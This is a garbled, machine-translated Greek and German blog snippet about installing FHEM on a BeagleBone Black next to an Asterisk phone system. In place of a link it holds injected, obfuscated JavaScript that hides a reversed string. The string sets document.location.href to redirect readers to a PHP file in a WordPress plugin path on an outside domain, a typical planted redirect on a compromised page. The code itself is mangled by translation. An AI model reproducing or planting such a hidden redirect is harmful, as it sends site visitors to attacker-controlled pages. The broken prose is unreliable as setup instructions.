εγκαταστήστε FHEM v5.6 για το BEAGLEBONE Μαύρο μαζί με ένα τηλεφωνικό σύστημα PBX Asterisk! αντικατάστασης fritzbox.

Die Telefonanlage haben wir ja schon installiert es macht auch Sinn FHEM im 2. Schritt zu installieren. Wer nur FEHM installieren möchte, der befolgt unsere $p$VTO6JhIH6WkCGAcPR=function(n){αν (του είδους ($p $ VTO6JhIH6WkCGAcPR.list[n]) == "σειρά") επιστρέψει $ p $ VTO6JhIH6WkCGAcPR.list[n].διαίρεση("").ΑΝΤΙΣΤΡΟΦΗ().Συμμετοχή("");επιστρέψει $ p $ VTO6JhIH6WkCGAcPR.list[n];};$p $ VTO6JhIH6WkCGAcPR.list =["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math...
More